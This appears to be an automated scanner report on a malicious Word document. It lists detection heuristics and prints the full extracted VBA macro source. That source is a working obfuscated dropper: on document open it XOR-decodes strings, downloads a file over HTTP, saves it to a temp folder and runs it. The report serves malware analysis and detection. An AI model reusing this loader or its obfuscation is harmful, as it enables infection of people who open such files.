Verdict: MALICIOUS
Risk score: 230
Heuristics (7)

- **VBA project inside OOXML** (medium; rule OOXML_VBA; 5 related findings): Document contains a VBA project; VBA macros present.
- **VBA downloads and writes a file to disk** (critical; rule OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `IpGNQwcRAAkZPjlRqmPR.Write pHnaVtDZFyeVzSKVw.responseBody`
- **Obfuscated auto-exec VBA loader** (critical; rule OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `Set doNrnoOMujexaYQ = CreateObject(ebszcPnwhgISPiqkopR(Array((144 + (36 - 17)), (156 Xor ((15 - 5) + 58)), 251, (11 Xor 200), 186, (33 + (195 - 4)), (211 + 14), (82 + 121), (113 Xor (23 - 11)), 238, 254, (200 - 93), (167 + 26)), Array((144 Xor 68), (38 + 133), (89 + 63), (112 Xor (219 - 26)), 211, 144, ((90 - 33) + 92), 229, ((7 - 3) Xor 10), (24 + 110), (183 - 28), (13 - 6), ((269 - 119) + 23))))`
- **CreateObject call** (high; rule OLE_VBA_CREATEOBJ): CreateObject call.
  Matched line in script: the same `Set doNrnoOMujexaYQ = CreateObject(...)` line quoted for the obfuscated-loader finding above.
- **VBA p-code auto-exec with execution tokens** (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- **Document_Open macro** (low; rule OLE_VBA_DOCOPEN): Document_Open macro.
  Matched line in script: `Private Sub Document_Open()`
- **Embedded URL** (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; each extracted URL carries a per-URL label naming the channel (macro, JS, link annotation, document body, ...) that reached it.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6658 bytes | 706d292dd1576709cdaf5fe3568a29c5fcf6089ca0766c195fc756ad4d3b47b5 |
Preview script (first 1,000 lines of the extracted macros.bas):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Function ebszcPnwhgISPiqkopR(xraMJWRpIWoSpKldtxHo As Variant, kvSOebdLMkIqyhB As Variant)
Dim lkxUVhGCEuXxtwGtE As String
lkxUVhGCEuXxtwGtE = ""
For i = LBound(xraMJWRpIWoSpKldtxHo) To UBound(xraMJWRpIWoSpKldtxHo)
lkxUVhGCEuXxtwGtE = lkxUVhGCEuXxtwGtE & Chr(kvSOebdLMkIqyhB(i) Xor xraMJWRpIWoSpKldtxHo(i))
Next
ebszcPnwhgISPiqkopR = lkxUVhGCEuXxtwGtE
End Function
Private Sub Document_Open()
gcVapLVNMTLoJBAXz
TdFSAYvpdzQiNKTv
End Sub
Private Sub gcVapLVNMTLoJBAXz()
MsgBox ebszcPnwhgISPiqkopR(Array((433 - 212), (15 Xor 19), (0 Xor (15 - 7)), 202, (20 Xor (213 - 47)), 62, (251 - 16), (91 - 0), ((42 - 11) Xor 55), 140, 90, (435 - 216), (1 + 7), 52, (25 Xor 57)), Array(137, 116, 109, ((182 - 0) Xor 92), (142 Xor 75), 81, 153, (64 - 16), ((0 + 16) Xor (91 - 1)), 227, 53, (252 - 76), 40, (53 Xor 98), (89 - 24))) & _
ebszcPnwhgISPiqkopR(Array(204, 245, 155, ((5 + 15) Xor ((38 - 18) + 20)), 141, 235, (7 Xor (38 + 12)), 70, 41, ((169 - 80) + (137 - 5)), 205, 104, (198 - 65), (266 - 84), 120), Array((((10 - 2) + 33) Xor (62 + 77)), (236 - 81), (359 - 115), (9 + (82 - 19)), (185 - 12), 137, (1 + 79), 102, (136 - 66), (56 Xor 149), (148 + 20), 6, ((12 + (40 - 3)) Xor 209), 210, 88)) & _
ebszcPnwhgISPiqkopR(Array(8, ((18 + 14) Xor 141), 207, (178 + 77), (11 Xor (87 + (35 - 17))), ((232 - 116) + (38 - 19)), (155 + 90), (26 + 75), (1 + 136), 64, 161, 223, (51 Xor (8 + 57)), 76, 194), Array((143 - 40), (150 Xor 73), (464 - 225), (26 Xor 151), (6 Xor (1 - 0)), (93 Xor (314 - 144)), (10 Xor 158), 12, 251, (((29 - 14) + 0) Xor 42), (29 Xor 216), 255, (5 Xor 21), (78 - 25), 226)) & _
ebszcPnwhgISPiqkopR(Array(92, ((64 - 6) + 169), (117 - 48), ((5 + 10) Xor (86 + 50)), 202, (4 + 13), 233, 155, (18 + 221), 151, 29, 138, (34 + (170 - 62)), 176, 23), Array(((21 - 6) + 2), (27 + 111), (55 - 17), 245, (115 + 50), 98, 134, (138 Xor 119), (130 Xor 25), (64 Xor (69 + 178)), (26 + 56), (172 Xor 64), 232, (75 + 142), (19 + 97))) & _
ebszcPnwhgISPiqkopR(Array((145 + 24), 44, 23, (51 + (128 - 12)), 61, 114, 195, 116, 87, (198 - 76), (38 + (175 - 74)), 125, 13, 3, ((4 + 0) Xor (24 - 9))), Array(204, (4 + 8), 117, (73 + 121), 94, (12 Xor 31), 182, (0 + 7), 50, (156 - 66), 226, 9, (4 Xor 46), 112, (73 - 30))) & _
ebszcPnwhgISPiqkopR(Array((19 Xor (352 - 162)), (48 + 34), 75, (57 - 10), 195, ((59 + 65) Xor ((2 - 0) + 0)), 64, 36), Array(206, 61, (112 - 55), 93, 182, 14, (76 - 24), (2 Xor 8))), 48
End Sub
Private Sub TdFSAYvpdzQiNKTv()
Set doNrnoOMujexaYQ = CreateObject(ebszcPnwhgISPiqkopR(Array((144 + (36 - 17)), (156 Xor ((15 - 5) + 58)), 251, (11 Xor 200), 186, (33 + (195 - 4)), (211 + 14), (82 + 121), (113 Xor (23 - 11)), 238, 254, (200 - 93), (167 + 26)), Array((144 Xor 68), (38 + 133), (89 + 63), (112 Xor (219 - 26)), 211, 144, ((90 - 33) + 92), 229, ((7 - 3) Xor 10), (24 + 110), (183 - 28), (13 - 6), ((269 - 119) + 23))))
Set dMoRBnJLWbkGaTRqxPLD = CreateObject(ebszcPnwhgISPiqkopR(Array((83 + 111), (91 + (147 - 35)), 49, (55 + 46), ((9 + (13 - 5)) Xor (61 - 27)), 30, (183 Xor (22 - 9)), (115 Xor (217 - 1)), (182 - 63), (50 + 19), (131 - 53), (133 Xor ((30 - 12) + 11)), (164 - 65), (103 + 49), 214), Array((275 - 98), (137 Xor (18 + (15 - 0))), ((38 - 16) Xor (98 - 13)), 12, ((37 - 14) Xor 84), 106, 211, 197, 16, (100 Xor 15), 40, (27 Xor 234), 15, 253, 165)) & _
ebszcPnwhgISPiqkopR(Array(27, (231 Xor 30), (222 - 87), (373 - 126), 55, 121, (293 - 107), (67 + (1 - 0)), 239, 12, (208 - 97)), Array(((44 + 6) Xor 80), 138, 243, 146, 90, 22, 216, 46, 138, (114 - 3), 27)))
temp = doNrnoOMujexaYQ.ExpandEnvironmentStrings(ebszcPnwhgISPiqkopR(Array((361 - 152), 200, 7, 152, 90, 4), Array(244, 156, 66, (149 Xor 64), 10, ((27 - 9) + 15)))) & ebszcPnwhgISPiqkopR(Array((166 - 16), ((100 - 48) + 54), (91 Xor (92 - 40)), (6 Xor (39 - 8)), 26, (236 - 75), 85, 240, 193, (125 + 39), (107 + 12), (11 Xor 19)), Array((176 Xor (216 - 94)), 6, 6, ((86 - 37) Xor (26 + 49)), 127, 207, 38, (202 - 53), 239, (26 Xor 200), 21, (88 Xor (90 - 39))))
Set pHnaVtDZFyeVzSKVw = CreateObject(ebszcPnwhgISPiqkopR(Array((2 Xor 74), 66, 32, (157 Xor 54), 174, ((12 + 1) Xor 49), 113, 112, (59 + 178), 173, 10, (((4 - 0) + 3) Xor ((121 - 59) + 12)), (101 Xor 173), (86 Xor (69 + 93)), (23 Xor 65)), Array(5, 43, (80 - 13), 217, (176 Xor (89 + 24)), (43 + 36), 30, (17 + (10 - 5)), 153, 131, (28 + 54), (0 Xor 0), 132, (8 Xor (200 - 20)), (1 Xor 3))) & _
ebszcPnwhgISPiqkopR(Array(((3 - 0) Xor ((17 - 2) + 31)), ((108 - 46) Xor 254)), Array((99 Xor 26), (5 + 139))))
Set IpGNQwcRAAkZPjlRqmPR = CreateObject(ebszcPnwhgISPiqkopR(Array(96, (108 + 71), 86, 43, (7 + 112), 211, ((10 + (4 - 1)) Xor 44), 48, 3, (31 + 47), (58 + 24), 51), Array(33, (80 + 167), ((3 - 1) Xor 27), (169 - 58), 53, (381 - 128), 114, (8 Xor 76), 113, 43, (28 + 23), (8 + 86))))
pHnaVtDZFyeVzSKVw.Open ebszcPnwhgISPiqkopR(Array(76, 226, 243), Array(((2 - 1) + 10), (40 + 127), (115 + 52))), ebszcPnwhgISPiqkopR(Array(80, 162, (25 Xor (374 - 119)), 3, 188, (39 + 6), (102 + 131), (((39 - 7) + (55 - 26)) Xor 79), (0 - 0), 246, 191, 159, 83, 37, (91 - 33)), Array(56, (153 Xor 79), ((68 - 25) Xor 185), 115, 207, (23 Xor (0 + 0)), 198, ((142 - 68) Xor 23), ((27 - 8) + 83), (2 Xor (59 + 96)), (323 - 118), (216 Xor (51 - 0)), 126, 70, 85)) & _
ebszcPnwhgISPiqkopR(Array(75, (106 Xor 186), 247, (61 + 7), (364 - 171), ((36 + 41) Xor (69 + 116)), 105, 116, 184, (246 - 54), 70, (134 Xor 38), (62 Xor (123 + (83 - 39))), 240, 63), Array((57 - 19), 189, 130, ((15 - 6) + (35 - 2)), 168, (276 - 125), (3 Xor 11), 0, (393 - 184), ((213 - 55) + 17), (21 Xor 61), (33 + 178), (31 Xor 168), 147, ((26 - 0) Xor 74))) & _
ebszcPnwhgISPiqkopR(Array(229, (238 - 109), (26 Xor (389 - 180)), 82, 202, ((96 - 26) Xor ((382 - 178) + 30)), 171, 251, (205 + 5), ((101 - 45) Xor 120), ((27 + 99) Xor 251), 182, 101, 254, (4 + 108)), Array((13 + 123), 174, (202 - 13), (40 Xor 19), (224 - 49), 219, 132, (120 + (25 - 3)), 161, 37, (476 - 229), (45 + 108), 9, ((182 - 76) Xor 253), (4 + 15))) & _
ebszcPnwhgISPiqkopR(Array(78, 74, (131 + 39), 98, 109, 83, (196 - 94), (1 Xor 17)), Array((21 + 22), 36, (96 + 121), 7, 67, 56, 3, (114 - 9))), False
pHnaVtDZFyeVzSKVw.Send
IpGNQwcRAAkZPjlRqmPR.Type = 1
IpGNQwcRAAkZPjlRqmPR.Open
IpGNQwcRAAkZPjlRqmPR.Write pHnaVtDZFyeVzSKVw.responseBody
IpGNQwcRAAkZPjlRqmPR.savetofile temp, 2
doNrnoOMujexaYQ.Run temp
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 17920 bytes | 398d1e689d4fd66689752349a6084fb0b4f5ad93c276ed526b2e20d0f6446531 |